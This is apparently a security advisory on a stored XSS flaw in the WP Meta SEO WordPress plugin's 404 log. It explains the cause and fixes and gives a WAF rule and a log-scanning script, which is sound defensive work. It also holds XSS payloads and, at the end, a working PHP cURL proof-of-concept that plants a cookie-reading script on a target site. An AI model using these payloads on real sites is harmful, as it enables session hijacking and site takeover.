Atomic Edge analysis of CVE-2026-9643 (metadata-based): This vulnerability allows unauthenticated stored cross-site scripting (XSS) in the WP Meta SEO plugin for WordPress, in versions up to and including 4.5.18. The attack targets the 404 logging feature. An attacker sends a specially crafted request for a non-existent page; the plugin logs the raw REQUEST_URI without sanitization, and an administrator who later views the 404 & Redirects log page triggers the stored script. The CVSS score is 7.2 (High) with a scope change, reflecting the potential for cookie theft or administrative actions performed under the victim's session.
Root Cause: The CWE-79 classification and the vulnerability description point to the root cause. The plugin's `wpmsTemplateRedirect()` function detects a 404 response, then concatenates `$_SERVER['HTTP_HOST']` with the raw `$_SERVER['REQUEST_URI']` value. The combined string is written directly into the `wp_wpms_links.link_url` database column via `$wpdb->insert()`. Atomic Edge analysis infers that no escaping or sanitization is applied to the URL string before insertion, and that the log page outputs the stored value without context-appropriate escaping when it renders. Storing and then echoing attacker-controlled input in this way leads to stored XSS.
Exploitation: An unauthenticated attacker can exploit this by requesting any non-existent path on the WordPress site. The path must end with a payload that breaks out of the URL context and injects JavaScript, for example a request to `http://target.com/anypath"><script>alert(document.cookie)</script>`. The server's REQUEST_URI, which includes the malicious payload, is logged. When an administrator opens the plugin's admin page at `/wp-admin/admin.php?page=metaseo_broken_link`, the unescaped payload executes in their browser. No authentication or nonce is required for the initial injection. One caveat for testers: PHP does not percent-decode `$_SERVER['REQUEST_URI']`, so the raw form above and the percent-encoded form used in the proof of concept further down are stored as different strings; which of them fires depends on whether the plugin decodes the value before display, which this metadata-based analysis does not establish, so test both.
Remediation: The fix must occur in two places. First, the plugin must sanitize or validate the `$_SERVER['REQUEST_URI']` value before storing it in the database; passing the URL through `sanitize_url()` or rejecting URIs that contain HTML or script characters would prevent the injection. Second, the plugin must escape the stored URL value when rendering the admin log page, using `esc_url()` where the value lands in an `href` attribute and `esc_html()` where it is shown as text, which neutralizes any script content that reached the database. Atomic Edge analysis recommends both server-side input validation and context-aware output escaping as a defense-in-depth approach.
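To make the root cause and the two-part fix concrete, here is an added stand-alone PHP script (an editorial example, not WP Meta SEO's code) that reproduces the store-and-render pattern described above and places the hardened form beside it. WordPress's `esc_url()`/`sanitize_url()` are not available outside WordPress, so `wp_style_esc_url()` is a local stand-in modelled on the character whitelist `esc_url()` applies, and `htmlspecialchars()` stands in for `esc_html()`. The sample host and request URIs are constructed, and every function name is this example's own. Running it also makes visible a point the analysis leaves open: because PHP does not percent-decode `REQUEST_URI`, the percent-encoded proof-of-concept payload only executes if the plugin decodes the stored value before display, whereas the raw form executes exactly as stored.

```php
<?php
// Added example: editorial illustration of the vulnerable store-and-render
// pattern and its hardened form; not WP Meta SEO's code. Runs with the PHP CLI.
declare(strict_types=1);

// Constructed sample input: what $_SERVER['HTTP_HOST'] and $_SERVER['REQUEST_URI']
// hold for the two PoC variants. PHP never percent-decodes REQUEST_URI.
const SAMPLE_HOST = 'example.com';
const SAMPLE_REQUEST_URIS = [
    'raw'     => '/anypath"><script>alert(document.cookie)</script>',
    'encoded' => '/anypath%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E',
];

/** Vulnerable store: raw concatenation, written as-is (the $wpdb->insert() step). */
function build_link_url_vulnerable(string $host, string $requestUri): string
{
    return $host . $requestUri;
}

/** Vulnerable render: the stored value is echoed into the admin table unescaped. */
function render_row_vulnerable(string $storedUrl): string
{
    return '<td><a href="' . $storedUrl . '">' . $storedUrl . '</a></td>';
}

/**
 * Local stand-in for WordPress esc_url()/sanitize_url() (assumption: modelled on
 * the character whitelist esc_url() applies). '<', '>', '"' and whitespace are
 * not in the set, so a tag or attribute break-out cannot survive the filter.
 */
function wp_style_esc_url(string $url): string
{
    return preg_replace('|[^a-z0-9~+_.?#=!&;,/:%@$\|*\'()\[\]\x80-\xff-]|i', '', $url) ?? '';
}

/** Hardened store: sanitize before the INSERT (the first fix above). */
function build_link_url_hardened(string $host, string $requestUri): string
{
    return wp_style_esc_url($host . $requestUri);
}

/**
 * Hardened render: context-aware escaping (the second fix above). The href
 * attribute gets URL escaping; the visible text gets HTML escaping, which is
 * what esc_html() does in WordPress.
 */
function render_row_hardened(string $storedUrl): string
{
    $href = wp_style_esc_url($storedUrl);
    $text = htmlspecialchars($storedUrl, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<td><a href="' . $href . '">' . $text . '</a></td>';
}

/** True when the rendered HTML contains a live <script> tag. */
function contains_script_tag(string $html): bool
{
    return preg_match('/<script\b/i', $html) === 1;
}

/**
 * Evaluate one request URI under three configurations and report whether a
 * script tag reaches the page: vulnerable store + vulnerable render, hardened
 * store + hardened render, and vulnerable store + hardened render (output
 * escaping alone, which is why both layers are recommended).
 */
function assess(string $host, string $requestUri): array
{
    $vulnStored = build_link_url_vulnerable($host, $requestUri);
    $hardStored = build_link_url_hardened($host, $requestUri);
    return [
        'vulnerable'      => contains_script_tag(render_row_vulnerable($vulnStored)),
        'hardened'        => contains_script_tag(render_row_hardened($hardStored)),
        'render_fix_only' => contains_script_tag(render_row_hardened($vulnStored)),
    ];
}

foreach (SAMPLE_REQUEST_URIS as $label => $uri) {
    foreach (assess(SAMPLE_HOST, $uri) as $config => $executes) {
        printf("%-8s %-16s script reaches page: %s\n", $label, $config, $executes ? 'yes' : 'no');
    }
}
```

Run it with the PHP CLI. The raw URI reaches the page only under the vulnerable configuration; both hardened configurations strip or encode it, and the render-only row shows that output escaping alone already neutralizes a value that was stored unsanitized. The encoded URI never yields a live tag as stored, because PHP leaves `%3Cscript%3E` as text: if the encoded proof of concept fires against a live install, the plugin must be decoding the value before display, which is the detail worth confirming when validating a fix.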
Impact: Successful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript in the context of an authenticated administrator’s session. The attacker can steal session cookies, perform administrative actions via XSS (like installing malicious plugins, modifying site options, or creating backdoor admin accounts), and deface the site. The scope change in the CVSS vector indicates that the injected script can affect resources beyond the vulnerable component. This can lead to full site compromise.
Here you will find our ModSecurity-compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-9643 (metadata-based)
# Blocks stored XSS via REQUEST_URI in WP Meta SEO 404 logging
# Targets requests with suspicious HTML/script content in the URI path.
# The PoC sends the payload percent-encoded, so every link of the chain decodes
# the URI (t:urlDecodeUni) before matching; the request is denied only when all
# three links match.
SecRule REQUEST_URI "@rx <[a-zA-Z/][^>]*>" \
    "id:20269643,phase:2,deny,status:403,t:none,t:urlDecodeUni,chain,msg:'CVE-2026-9643 WP Meta SEO Unauthenticated Stored XSS via REQUEST_URI',severity:'CRITICAL',tag:'CVE-2026-9643'"
    SecRule REQUEST_URI "@rx [()<>]" "t:none,t:urlDecodeUni,chain"
    SecRule REQUEST_URI "@rx alert|script|onload|onerror|onmouseover|javascript:" "t:none,t:urlDecodeUni,t:lowercase"
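The rule above only sees requests in flight. As a detection-side counterpart (an added example; this is neither Atomic Edge's rule nor plugin code), the following stand-alone PHP script applies the same three-pattern test to the 404 entries of an Apache/nginx combined-format access log, percent-decoding the path first, so an operator can find payloads that may already have been written to `wp_wpms_links` before the rule was deployed. The log lines are constructed samples, and `find_suspect_404s()` and the other function names are this example's own.

```php
<?php
// Added example: offline triage of access-log 404s against the WAF rule's three
// patterns. Not Atomic Edge's rule and not plugin code. Runs with the PHP CLI.
declare(strict_types=1);

// Constructed sample log lines (combined format). Line 2 carries the PoC's
// percent-encoded payload, line 3 a raw-form payload (Apache writes a literal
// quote in the request line as \"), line 4 is a benign 404 and line 5 a 200
// response whose query string contains a harmless tag.
const SAMPLE_LOG = <<<'LOG'
203.0.113.5 - - [01/Mar/2026:10:00:01 +0000] "GET /about/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Mar/2026:10:00:07 +0000] "GET /anypath%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 404 2048 "-" "curl/8.4.0"
203.0.113.9 - - [01/Mar/2026:10:00:08 +0000] "GET /x\"><svg/onload=alert(1)> HTTP/1.1" 404 2048 "-" "curl/8.4.0"
198.51.100.2 - - [01/Mar/2026:10:01:13 +0000] "GET /old-page HTTP/1.1" 404 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Mar/2026:10:02:40 +0000] "GET /?s=%3Cb%3Ehello%3C/b%3E HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
LOG;

/** The three chained SecRule patterns, applied to the decoded path. */
const TAG_PATTERN     = '/<[a-zA-Z\/][^>]*>/';
const SPECIAL_PATTERN = '/[()<>]/';
const KEYWORD_PATTERN = '/alert|script|onload|onerror|onmouseover|javascript:/i';

/**
 * Parse one combined-format line into client, time, method, path and status.
 * Returns null when the line does not match the format.
 */
function parse_log_line(string $line): ?array
{
    // The request field may contain \" and \\ escapes, so match it escape-aware.
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "((?:[^"\\\\]|\\\\.)*)" (\d{3}) /';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    $request = stripcslashes($m[3]);        // undo Apache's \" and \xhh escaping
    $parts   = explode(' ', $request, 3);   // METHOD PATH PROTOCOL
    return [
        'ip'     => $m[1],
        'time'   => $m[2],
        'method' => $parts[0],
        'path'   => $parts[1] ?? '',
        'status' => (int) $m[4],
    ];
}

/** True when the percent-decoded path matches all three rule patterns. */
function path_matches_rule(string $path): bool
{
    $decoded = rawurldecode($path);        // mirrors t:urlDecodeUni on the WAF side
    return preg_match(TAG_PATTERN, $decoded) === 1
        && preg_match(SPECIAL_PATTERN, $decoded) === 1
        && preg_match(KEYWORD_PATTERN, $decoded) === 1;
}

/** Return the 404 entries whose path matches the rule, in log order. */
function find_suspect_404s(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $entry = parse_log_line($line);
        if ($entry === null || $entry['status'] !== 404) {
            continue;
        }
        if (path_matches_rule($entry['path'])) {
            $entry['decoded_path'] = rawurldecode($entry['path']);
            $hits[] = $entry;
        }
    }
    return $hits;
}

foreach (find_suspect_404s(SAMPLE_LOG) as $hit) {
    printf("%s %s %s %s\n", $hit['time'], $hit['ip'], $hit['method'], $hit['decoded_path']);
}
```

Against the constructed sample the script reports the two 404 lines from 203.0.113.9 and nothing else: the benign 404 has no tag, and the 200 response is excluded because the plugin only logs 404s. Point it at a real log by replacing `SAMPLE_LOG` with the file contents; any hit is a candidate row to inspect in `wp_wpms_links` and remove before an administrator opens the log page. The decoding step is the part to keep in mind: a grep for a literal `<script` in the raw log would miss the percent-encoded form entirely.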
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-9643 - WP Meta SEO <= 4.5.18 - Unauthenticated Stored Cross-Site Scripting via REQUEST_URI
$target_url = 'http://example.com'; // Change to the target WordPress site URL
// Craft a malicious path for the 404 request.
// The payload is a simple XSS that will execute in the admin's browser when they view the logs.
// Note: PHP does not percent-decode $_SERVER['REQUEST_URI'], so the plugin stores this string
// exactly as sent; if the encoded form does not fire, also test the raw form shown in the
// Exploitation section above.
$payload = '/anypath%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E'; // URL-encoded version
$full_request_url = $target_url . $payload;
// Initialize cURL session
$ch = curl_init();
// Set cURL options - this mimics an unauthenticated request to trigger the 404 logging
curl_setopt($ch, CURLOPT_URL, $full_request_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable for testing with self-signed certs
// Execute the request
$response = curl_exec($ch);
// Check for errors
if (curl_errno($ch)) {
    echo 'Error: ' . curl_error($ch) . "\n";
} else {
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    echo "Request sent successfully. HTTP code: " . $http_code . "\n";
    echo "If the target runs WP Meta SEO 4.5.18 or below, the payload has been logged.\n";
    echo "An administrator visiting /wp-admin/admin.php?page=metaseo_broken_link will execute the script.\n";
}
// Close cURL session
curl_close($ch);
?>